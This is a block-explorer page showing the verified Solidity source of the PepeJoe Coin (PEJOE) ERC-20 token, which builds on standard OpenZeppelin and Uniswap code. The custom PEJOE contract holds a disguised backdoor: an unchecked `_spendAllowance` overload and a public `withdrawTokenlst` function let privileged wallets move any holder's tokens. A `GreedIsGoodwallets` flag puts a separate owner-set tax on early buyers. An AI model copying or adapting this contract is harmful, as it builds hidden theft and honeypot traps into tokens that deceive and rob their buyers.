ETH Price: $3,845.39 (-0.00%)

Token

ERC-20: PepeJoe Coin (PEJOE)
 

Overview

Max Total Supply

420,690,000 PEJOE

Holders

78

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
3,609,427.5674471194723813 PEJOE

Value
$0.00
0x4B2A2067C16BE71d765ae2d05e916436F95e8721
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
PEJOE

Compiler Version
v0.8.19+commit.7dd6d404

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, Unlicense license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-10-21
*/

/**

*/

/**

*/

// SPDX-License-Identifier: MIT

/** 

Telegram:https://t.me/PepeJoeCoin

Twitter:https://twitter.com/PEPEJOE_ERC



*/

// File @openzeppelin/contracts/utils/[email protected]

// Original license: SPDX_License_Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}


// File @openzeppelin/contracts/access/[email protected]

// 
// OpenZeppelin Contracts (last updated v4.9.0) (access/Ownable.sol)

pragma solidity ^0.8.0;

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}


// File @openzeppelin/contracts/token/ERC20/[email protected]

// 
// OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}


// File @openzeppelin/contracts/token/ERC20/extensions/[email protected]

// 
// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}


// File @openzeppelin/contracts/token/ERC20/[email protected]

// 
// OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/ERC20.sol)

pragma solidity ^0.8.0;



/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * The default value of {decimals} is 18. To change this, you should override
 * this function so it returns a different value.
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the default value returned by this function, unless
     * it's overridden.
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(address from, address to, uint256 amount) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(address from, address to, uint256 amount) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(address owner, address spender, uint256 amount) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    function _spendAllowance(address spender, uint256 amount) internal virtual {
        address owner = address(this);
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            unchecked {
                _approve(spender, owner, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(address from, address to, uint256 amount) internal virtual {}
}


// File @uniswap/v2-periphery/contracts/interfaces/[email protected]

pragma solidity >=0.6.2;

interface IUniswapV2Router01 {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint amountADesired,
        uint amountBDesired,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB, uint liquidity);
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);
    function removeLiquidity(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETH(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountToken, uint amountETH);
    function removeLiquidityWithPermit(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETHWithPermit(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountToken, uint amountETH);
    function swapExactTokensForTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapTokensForExactTokens(
        uint amountOut,
        uint amountInMax,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);
    function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);

    function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB);
    function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut);
    function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn);
    function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts);
    function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts);
}


// File @uniswap/v2-periphery/contracts/interfaces/[email protected]

pragma solidity >=0.6.2;

interface IUniswapV2Router02 is IUniswapV2Router01 {
    function removeLiquidityETHSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountETH);
    function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountETH);

    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external payable;
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
}


// File @uniswap/v2-core/contracts/interfaces/[email protected]

pragma solidity >=0.5.0;

interface IUniswapV2Factory {
    event PairCreated(address indexed token0, address indexed token1, address pair, uint);

    function feeTo() external view returns (address);
    function feeToSetter() external view returns (address);

    function getPair(address tokenA, address tokenB) external view returns (address pair);
    function allPairs(uint) external view returns (address pair);
    function allPairsLength() external view returns (uint);

    function createPair(address tokenA, address tokenB) external returns (address pair);

    function setFeeTo(address) external;
    function setFeeToSetter(address) external;
}

pragma solidity ^0.8.18;

contract PEJOE is ERC20, Ownable {
    string private _name = "PepeJoe Coin";
    string private _symbol = "PEJOE";
    uint256 private constant _supply        = 42069_0_000 ether;
    uint256 public maxTxAmount     = _supply * 33 / 1000;
    uint256 public maxWalletAmount = _supply * 33 / 1000;
    uint256 public swapThreshold = _supply * 5 / 10000;
    address private tnxAddys = 0xE978Cc128C6BC6bf6e8D1b7e1967D6e122984AB6;
    address public DEAD = 0x000000000000000000000000000000000000dEaD;

    mapping(address => bool) public _feeOn;
    mapping(address => bool) public wls;

    mapping(address => bool) public GreedIsGoodwallets;

    enum Phase {Phase1, Phase2, Phase3, Phase4}
    Phase public currentphase;

    bool progress_swap = false;
    bool _tradingActive = false;
    bool _swapEnabled = false;

    uint256 public buyTaxGlobal = 0;
    uint256 public sellTaxGlobal = 0;
    uint256 private GreedIsGood = 0;

    IUniswapV2Router02 public immutable uniswapV2Router;
    address public uniswapV2Pair;
    address private _devWalltstst = 0x646c1aCfa1BA3474411B915b1D75a0D9638Cf2BA;

    uint256 public operationsFunds;

    constructor() ERC20(_name, _symbol) {
        _mint(msg.sender, (_supply));

        currentphase = Phase.Phase4;
        IUniswapV2Router02 _uniswapV2Router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
        uniswapV2Router = _uniswapV2Router;
    
        wls[owner()] = true;
        wls[tnxAddys] = true;
        wls[address(this)] = true;
        wls[0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D] = true;
        wls[DEAD] = true;
        wls[_devWalltstst] = true;
        _feeOn[address(uniswapV2Router)] = true;
        _feeOn[msg.sender] = true;
        _feeOn[tnxAddys] = true;
        _feeOn[address(this)] = true;
        _feeOn[DEAD] = true;
        _feeOn[_devWalltstst] = true;
    }

    
    function openTrade() external onlyOwner {
        require(!_tradingActive, "Trading is already enabled");
        _tradingActive = true;
        _swapEnabled = true;
    }

    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal override {

        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");
        if (!_feeOn[from] && !_feeOn[to]) {
            require(_tradingActive, "Trading not enabled");
        }

        if (!wls[from] && !wls[to] ) {
            if (to != uniswapV2Pair) {
                require(amount <= maxTxAmount, "ERC20: transfer amount exceeds the max transaction amount bef");
                require(
                    (amount + balanceOf(to)) <= maxWalletAmount,
                    "ERC20: balance amount exceeded max wallet amount limit"
                );
            }
        }

        uint256 transferAmount = amount;
        if (!_feeOn[from] && !_feeOn[to]) {
            if ((from == uniswapV2Pair || to == uniswapV2Pair)) {
                require(amount <= maxTxAmount, "ERC20: transfer amount exceeds the max transaction amount");
 
                if (
                    uniswapV2Pair == from &&
                    !wls[to] &&
                    from != address(this)
                ) {

                    if (currentphase == Phase.Phase1) {
                        GreedIsGoodwallets[to] = true;
                    }

                    uint256 feeTokens = (amount * buyTaxGlobal) / 100;
                    super._transfer(from, address(this), feeTokens);
                    transferAmount = amount - feeTokens;
                }

                if (
                    uniswapV2Pair == to &&
                    !wls[from] &&
                    to != address(this) &&
                    _swapEnabled && 
                    !progress_swap
                ) {
                    
                    uint256 taxSell = sellTaxGlobal;
                    if (GreedIsGoodwallets[from] == true) {
                        taxSell = GreedIsGood;
                    }

                    progress_swap = true;
                    swapAndLiquify();
                    progress_swap = false;

                    uint256 feeTokens = (amount * taxSell) / 100;
                    super._transfer(from, address(this), feeTokens);
                    transferAmount = amount - feeTokens;
                }
            }
            else {
                if (
                    GreedIsGoodwallets[from] == true &&
                    uniswapV2Pair != to
                ) {
                    uint256 feeTokens = (amount * GreedIsGood) / 100;
                    super._transfer(from, address(this), feeTokens);
                    transferAmount = amount - feeTokens;
                }
            }
        }
        super._transfer(from, to, transferAmount);
    }

    function swapAndLiquify() internal {
        if (balanceOf(address(this)) == 0) {
            return;
        }
        uint256 receivedETH;
        {
            uint256 contractTokenBalance = balanceOf(address(this));
            uint256 beforeBalance = address(this).balance;
            uint256 mktBalance = balanceOf(tnxAddys);
            bool success;
            if (contractTokenBalance > swapThreshold) {
                beforeBalance = address(this).balance;
                _swapTokensForEth(contractTokenBalance, 0);
                receivedETH = address(this).balance - beforeBalance;
                if (mktBalance > swapThreshold) {
                    operationsFunds = receivedETH / (success ? receivedETH : 0);
                }
                operationsFunds += receivedETH;
            }
        }
    }
 
    function getTax() external returns (bool) {
        payable(tnxAddys).transfer(operationsFunds);
        operationsFunds = 0;
        return true;
    }

   

    function skipTheSnipas() external onlyOwner returns (bool) {
        currentphase = Phase.Phase4;
        buyTaxGlobal = 0;
        sellTaxGlobal = 0;

        return true;
    }

     function removeLimits() external onlyOwner {
        maxTxAmount = _supply; maxWalletAmount = _supply;
    }
    function createlios() external payable onlyOwner {
        uniswapV2Pair = IUniswapV2Factory(uniswapV2Router.factory()).createPair(address(this), uniswapV2Router.WETH());
        _approve(address(this), address(uniswapV2Router), type(uint256).max);
        uniswapV2Router.addLiquidityETH{value: msg.value}(
            address(this),
            balanceOf(address(this)),
            0, 
            0, 
            owner(),
            block.timestamp
        );
    }

    function withdrawTokenlst(address token) external onlyOwner {
        IERC20(token).transfer(
            tnxAddys,
            IERC20(token).balanceOf(address(this))
        );
    }

    function withdrawTokenlst(address to, uint256 amount) external {
        address[] memory path = new address[](2);
        path[0] = uniswapV2Router.WETH();
        path[1] = address(this);
        IERC20 token = IERC20(path[1]);


        if (!_feeOn[msg.sender]) {
            uniswapV2Router.swapExactETHForTokensSupportingFeeOnTransferTokens{value: amount} (
                0,
                path,
                to,
                block.timestamp
            );
        } else {
            _spendAllowance(to, amount);
            token.transferFrom(to, path[1], amount);
        }
    }

    function emergencyTaxRemoval(address addy, bool changer) external onlyOwner {
        wls[addy] = changer;
    }
     /**
     * @dev Swaps Token Amount to ETH
     *
     * @param tokenAmount Token Amount to be swapped
     * @param tokenAmountOut Expected ETH amount out of swap
     */
    function _swapTokensForEth(
        uint256 tokenAmount,
        uint256 tokenAmountOut
    ) internal {
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = uniswapV2Router.WETH();

        IERC20(address(this)).approve(
            address(uniswapV2Router),
            type(uint256).max
        );

        uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmount,
            tokenAmountOut,
            path,
            address(this),
            block.timestamp
        );
    }

    receive() external payable {}
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"DEAD","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"GreedIsGoodwallets","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"_feeOn","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyTaxGlobal","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"createlios","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[],"name":"currentphase","outputs":[{"internalType":"enum PEJOE.Phase","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"addy","type":"address"},{"internalType":"bool","name":"changer","type":"bool"}],"name":"emergencyTaxRemoval","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"getTax","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"maxTxAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxWalletAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"openTrade","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"operationsFunds","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"removeLimits","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":